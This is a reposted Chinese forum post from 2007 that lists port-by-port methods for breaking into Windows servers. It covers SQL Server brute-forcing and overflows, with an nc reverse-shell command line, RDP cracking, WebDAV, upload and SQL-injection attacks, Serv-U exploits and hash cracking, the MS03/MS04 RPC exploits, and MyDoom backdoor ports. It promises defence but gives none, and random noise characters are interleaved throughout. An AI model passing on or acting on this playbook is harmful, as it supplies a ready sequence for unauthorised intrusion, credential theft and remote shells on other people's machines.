|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 ! i$ t: @8 V, N; y4 H' j, `
! a* L4 g z& N* Z/ S! i
+ F3 E+ D' Y; u 1. 1433端口入侵 & o0 x" N* A9 n! }& U
* p$ Z8 X x7 E- m. N scanport.exe 查有1433的机器
* L. n; C, h& F4 s
$ o& m- B0 G' \% y" f) K SQLScanPass.exe 进行字典暴破(字典是关键) 5 o% L4 L' X/ N8 u' _
' Y* i1 H- V, a, @( W: P 最后 SQLTools.exe入侵 : m/ n& z' i' L* K% x# l
; ~9 A+ m ?) N$ L: i =============================
4 k1 w1 n7 ?% D3 p& K5 r
/ i% r9 c5 Z# F# B" K 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
6 J/ ^# y1 Q% u. A
" i! F" ^* ?8 L2 ?2 c# v! q; z nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 # A2 [! F% G0 Z* m& ]2 {
' O( A) v: y' g" ~; _. |& x (以上反向的,测试成功) " w+ N& p, B8 P$ [+ N
$ S8 x; M) A# T
sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 9 f3 Q! e; m; }& A
; a% L: S# E$ a4 Z7 I: ^
2. 4899端口入侵 # J3 {3 G' A$ }( ^9 S4 z3 T
P/ [+ _- N' G* p4 i; Y 用4899过滤器.exe,扫描空口令的机器
k. Q- l+ z* ]1 ^% b4 p# ?& ^" P6 y
3. 3899的入侵 4 p% W; o) b" D a; y
& @2 G% C/ g/ Z6 B- G: i, @" v+ o
对很早的机器,可以试试3389的溢出(win3389ex.exe)
$ ]' p/ @" Q) q) }; y& a$ W V C* N3 N1 T, |
对2000的机器,可以试试字典暴破。(tscrack.exe) 1 {, D3 S4 A& L0 v: C
1 G( ?9 v2 n! q5 Q, _ 4. 80入侵
6 T' w, o( F' g% j& c$ q5 y% {3 J) u. E6 L! N5 N- T. T! s
对sp3以前的机器,可以用webdav入侵;
8 t: z) F; w3 T6 G2 o1 y* ^8 f6 o. P3 y3 Y3 M2 H6 ` s5 [2 c/ d3 h
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
4 m, R/ }9 ?& _+ t% ^4 A& s" `% u3 L! _3 a# E1 o
可以利用SQL进行注入。(小榕的注入软件)。 7 c' a3 b9 p4 X7 E( i1 ?
0 i7 L5 m- H+ y1 x$ _+ v
5. serv-u入侵(21端口) ) q) W: F/ Q8 K' u/ I: R
! S- v# m- @# J0 E- n% |/ w1 _
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
' A; F5 p0 B/ f: R/ r, d. v5 v- E2 g9 q" G
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
1 g% X5 l: Z! I/ M. D1 N$ V$ h! H7 r+ z) E
====================================== 9 V0 T+ J5 G) l$ c, R' q* R
p- O7 {2 ` B& z3 g# n& w
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) f- s, D* c( b' s8 c) Z2 N1 X% K
0 \& i9 p* y0 R2 O$ | 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 7 j% \( ]' p Z3 ^* [" G% l
- \& s6 m! _$ j) }; j) I, U
6. 554端口 5 G$ h, v1 Q! ?' o8 H3 k5 R
0 x2 p8 O# ~* {- e
用real554.exe入侵。 0 M; R! Q( d( c. F6 @- k
- t- G: k9 n9 b, O/ X* d3 k- o" \: v
7. 6129端口 1 [7 E6 n# e+ y& M
U3 b/ s' g4 o, g/ F8 t
用DameWare6129.exe入侵。 : J+ a* S. T! Y, i7 {' D0 U' K$ h
! r* t+ a; h( }0 m 8. 系统漏洞 0 Z1 Z+ w c8 s* ^* U s
2 l0 b) N+ _2 L% K2 j$ L" E3 l 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 3 M4 m4 G# W" F4 H5 J5 F$ q6 f
+ z" O/ s3 m- P9 A
进行溢出入侵。 4 Z7 s! x0 m5 V4 r8 m% l9 x$ D
& d6 a8 |8 w" }" r8 ?) |0 _9 {. u) F 9. 3127等端口
4 A6 K7 A7 Y2 u7 }. ~, \& D
1 @, E# W( `* p j 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 & ?6 g, d+ f$ e
* {$ C0 Q. e; Z- f/ n- z/ g
10. 其他入侵 $ s1 Y7 ^% A$ G
" q# V% F% P: {0 q ^4 W# N& {
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。& L! P5 I2 N7 H! o) e* S7 d
% i2 ^9 r! M" I1 t
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
